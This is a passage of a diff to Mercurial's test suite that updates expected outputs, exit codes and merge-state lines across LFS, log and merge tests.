+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
@@ -332,7 +330,7 @@
$LOCALIP - - [$LOGDATE$] "PUT /.hg/lfs/objects/b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c HTTP/1.1" 422 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D392c05922088bacf8e68a6939b480017afbf245d x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=525251863cad618e55d483555f3d00a2ca99597e&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 500 - (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
@@ -483,7 +481,7 @@
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 401 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=capabilities HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /?cmd=batch HTTP/1.1" 200 - x-hgarg-1:cmds=heads+%3Bknown+nodes%3D x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
- $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Arev-branch-cache%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
+ $LOCALIP - - [$LOGDATE$] "GET /?cmd=getbundle HTTP/1.1" 200 - x-hgarg-1:bookmarks=1&bundlecaps=HG20%2Cbundle2%3DHG20%250Abookmarks%250Achangegroup%253D01%252C02%252C03%250Acheckheads%253Drelated%250Adigests%253Dmd5%252Csha1%252Csha512%250Aerror%253Dabort%252Cunsupportedcontent%252Cpushraced%252Cpushkey%250Ahgtagsfnodes%250Alistkeys%250Aphases%253Dheads%250Apushkey%250Aremote-changegroup%253Dhttp%252Chttps%250Astream%253Dv2&cg=1&common=0000000000000000000000000000000000000000&heads=506bf3d83f78c54b89e81c6411adee19fdf02156+525251863cad618e55d483555f3d00a2ca99597e&listkeys=bookmarks&phases=1 x-hgproto-1:0.1 0.2 comp=$USUAL_COMPRESSIONS$ partial-pull (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 401 - (glob)
$LOCALIP - - [$LOGDATE$] "POST /.git/info/lfs/objects/batch HTTP/1.1" 200 - (glob)
$LOCALIP - - [$LOGDATE$] "GET /.hg/lfs/objects/276f73cfd75f9fb519810df5f5d96d6594ca2521abd86cbcd92122f7d51a1f3d HTTP/1.1" 200 - (glob)
--- a/tests/test-lfs-serve.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-serve.t Tue Apr 20 11:01:06 2021 -0400
@@ -293,7 +293,7 @@
requesting all changes
remote: abort: no common changegroup version
abort: pull failed on remote
- [255]
+ [100]
$ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES
$TESTTMP/server/.hg/requires:lfs
@@ -462,6 +462,7 @@
remote: adding manifests
remote: adding file changes
remote: added 1 changesets with 1 changes to 1 files
+ (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?)
$ grep 'lfs' .hg/requires $SERVER_REQUIRES
.hg/requires:lfs
$TESTTMP/server/.hg/requires:lfs
--- a/tests/test-lfs-test-server.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-lfs-test-server.t Tue Apr 20 11:01:06 2021 -0400
@@ -17,7 +17,7 @@
#endif
#if no-windows git-server
- $ lfs-test-server &> lfs-server.log &
+ $ lfs-test-server > lfs-server.log 2>&1 &
$ echo $! >> $DAEMON_PIDS
#endif
@@ -40,6 +40,8 @@
#endif
$ cat >> $HGRCPATH <<EOF
+ > [ui]
+ > paginate=no
> [experimental]
> lfs.worker-enable = False
> [extensions]
@@ -113,7 +115,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: 31cf46fbc4ecd458a0943c5b4881f1f5a6dd36c53d6167d5b69ac45149b38e5b
@@ -277,7 +279,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: 37a65ab78d5ecda767e8622c248b5dbff1e68b1678ab0e730d5eb8601ec8ad19
@@ -285,7 +287,7 @@
Status: 200 (git-server !)
Status: 201 (hg-server !)
Content-Length: 0
- Content-Type: text/plain; charset=utf-8
+ Content-Type: text/plain; charset=utf-8 (hg-server !)
Date: $HTTP_DATE$
Server: testing stub value (hg-server !)
lfs: processed: d11e1a642b60813aee592094109b406089b8dff4cb157157f753418ec7857998
@@ -888,7 +890,7 @@
$ mkdir $TESTTMP/lfs-server2
$ cd $TESTTMP/lfs-server2
#if no-windows git-server
- $ lfs-test-server &> lfs-server.log &
+ $ lfs-test-server > lfs-server.log 2>&1 &
$ echo $! >> $DAEMON_PIDS
#endif
--- a/tests/test-log.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-log.t Tue Apr 20 11:01:06 2021 -0400
@@ -2001,6 +2001,26 @@
@@ -0,0 +1,1 @@
+b
+
+Test that diff.merge is respected (file b was added on one side and
+and therefore merged cleanly)
+
+ $ hg log -pr 3 --config diff.merge=yes
+ changeset: 3:8e07aafe1edc
+ tag: tip
+ parent: 2:b09be438c43a
+ parent: 1:925d80f479bb
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: 3
+
+ diff -r 8e07aafe1edc a
+ --- a/a Thu Jan 01 00:00:00 1970 +0000
+ +++ b/a Thu Jan 01 00:00:00 1970 +0000
+ @@ -1,1 +1,1 @@
+ -b
+ +c
+
$ cd ..
'hg log -r rev fn' when last(filelog(fn)) != rev
--- a/tests/test-mactext.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-mactext.t Tue Apr 20 11:01:06 2021 -0400
@@ -27,7 +27,7 @@
transaction abort!
rollback completed
abort: pretxncommit.cr hook failed
- [255]
+ [40]
$ hg cat f | f --hexdump
0000: 68 65 6c 6c 6f 0a |hello.|
--- a/tests/test-manifest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-manifest.py Tue Apr 20 11:01:06 2021 -0400
@@ -6,6 +6,8 @@
import unittest
import zlib
+from mercurial.node import sha1nodeconstants
+
from mercurial import (
manifest as manifestmod,
match as matchmod,
@@ -436,7 +438,7 @@
class testtreemanifest(unittest.TestCase, basemanifesttests):
def parsemanifest(self, text):
- return manifestmod.treemanifest(b'', text)
+ return manifestmod.treemanifest(sha1nodeconstants, b'', text)
def testWalkSubtrees(self):
m = self.parsemanifest(A_DEEPER_MANIFEST)
--- a/tests/test-merge-changedelete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-changedelete.t Tue Apr 20 11:01:06 2021 -0400
@@ -96,17 +96,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -163,17 +166,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -243,17 +249,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -307,17 +316,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -358,17 +370,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "r")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -405,17 +420,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "r")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -453,17 +471,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -512,17 +533,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -573,17 +597,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -631,17 +658,20 @@
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
extra: merge-removal-candidate = yes
+ extra: merged = yes
file: file3 (state "u")
local path: file3 (hash d5b0a58bc47161b1b8a831084b366f757c4f0b11, flags "")
ancestor path: file3 (node 2661d26c649684b482d10f91960cc3db683c38b4)
other path: file3 (node a2644c43e210356772c7772a8674544a62e06beb)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -801,11 +831,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -840,11 +872,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -877,11 +911,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "r")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
*** file1 does not exist
--- file2 ---
2
@@ -916,11 +952,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -963,11 +1001,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
@@ -1011,11 +1051,13 @@
ancestor path: file1 (node b8e02f6433738021a065f94175c7cd23db5f05be)
other path: file1 (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
file: file2 (state "u")
local path: file2 (hash 0000000000000000000000000000000000000000, flags "")
ancestor path: file2 (node 5d9299349fc01ddd25d0070d149b124d8f10411e)
other path: file2 (node e7c1328648519852e723de86c0c0525acd779257)
extra: ancestorlinknode = ab57bf49aa276a22d35a473592d4c34b5abc3eff
+ extra: merged = yes
--- file1 ---
1
changed
--- a/tests/test-merge-criss-cross.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-criss-cross.t Tue Apr 20 11:01:06 2021 -0400
@@ -540,6 +540,7 @@
other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
extra: other-file (filenode-source = other)
$ hg ci -m "merge-deleting-the-file-from-deleted"
$ hg manifest
@@ -563,6 +564,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
$ hg ci -m "merge-deleting-the-file-from-updated"
created new head
$ hg manifest
@@ -586,6 +588,7 @@
other path: the-file (node 59e363a07dc876278f0e41756236f30213b6b460)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
extra: other-file (filenode-source = other)
$ hg ci -m "merge-keeping-the-file-from-deleted"
created new head
@@ -614,6 +617,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 955800955977bd6c103836ee3e437276e940a589
extra: merge-removal-candidate = yes
+ extra: merged = yes
$ hg ci -m "merge-keeping-the-file-from-updated"
created new head
$ hg manifest
@@ -695,6 +699,7 @@
other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): adfd88e5d7d3d3e22bdd26512991ee64d59c1d8f
@@ -763,6 +768,7 @@
other path: the-file (node 885af55420b35d7bf3bbd6f546615295bfe6544a)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): a4e0e44229dc130be2915b92c957c093f8c7ee3e
@@ -886,6 +892,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a
@@ -923,6 +930,7 @@
other path: the-file (node 0000000000000000000000000000000000000000)
extra: ancestorlinknode = 9b610631ab29024c5f44af7d2c19658ef8f8f071
extra: merge-removal-candidate = yes
+ extra: merged = yes
#else
$ hg debugmergestate
local (working copy): e9b7081317232edce73f7ad5ae0b7807ff5c326a
--- a/tests/test-merge-remove.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-remove.t Tue Apr 20 11:01:06 2021 -0400
@@ -95,7 +95,7 @@
$ hg merge
bar: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat bar
memories of buried pirate treasure
--- a/tests/test-merge-subrepos.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-subrepos.t Tue Apr 20 11:01:06 2021 -0400
@@ -117,10 +117,17 @@
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
XXX: There's a difference between wdir() and '.', so there should be a status.
-`hg files -S` from the top is also missing 'subrepo/b'.
+`hg files -S` from the top is also missing 'subrepo/b'. The files should be
+seen as deleted (and, maybe even missing? in which case `hg files` should list
+it)
$ hg st -S
+ R subrepo/b (missing-correct-output !)
$ hg st -R subrepo
+ R subrepo/b (missing-correct-output !)
+
+(note: return [1] because no files "match" since the list is empty)
+
$ hg files -R subrepo
[1]
$ hg files -R subrepo -r '.'
--- a/tests/test-merge-tools.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge-tools.t Tue Apr 20 11:01:06 2021 -0400
@@ -377,7 +377,7 @@
merging f
some fail message
abort: $TESTTMP/mybrokenmerge.py hook failed
- [255]
+ [40]
$ aftermerge
# cat f
revision 1
@@ -1921,7 +1921,7 @@
Binary files capability checking
$ hg update -q -C 0
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> with open('b', 'wb') as fp:
> fp.write(b'\x00\x01\x02\x03')
> EOF
@@ -1929,7 +1929,7 @@
$ hg commit -qm "add binary file (#1)"
$ hg update -q -C 0
- $ python <<EOF
+ $ "$PYTHON" <<EOF
> with open('b', 'wb') as fp:
> fp.write(b'\x03\x02\x01\x00')
> EOF
--- a/tests/test-merge1.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-merge1.t Tue Apr 20 11:01:06 2021 -0400
@@ -113,7 +113,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
#if symlink
symlinks to directories should be treated as regular files (issue5027)
@@ -122,7 +122,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
symlinks shouldn't be followed
$ rm b
$ echo This is file b1 > .hg/b
@@ -130,7 +130,7 @@
$ hg merge 1
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ rm b
$ echo This is file b2 > b
@@ -144,7 +144,7 @@
$ hg merge 1 --config merge.checkunknown=abort
b: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
this merge should warn
$ hg merge 1 --config merge.checkunknown=warn
@@ -188,7 +188,7 @@
$ hg merge 3 --config merge.checkignored=ignore --config merge.checkunknown=abort
remoteignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg merge 3 --config merge.checkignored=abort --config merge.checkunknown=ignore
merging .hgignore
merging for .hgignore
@@ -210,15 +210,15 @@
b: untracked file differs
localignored: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
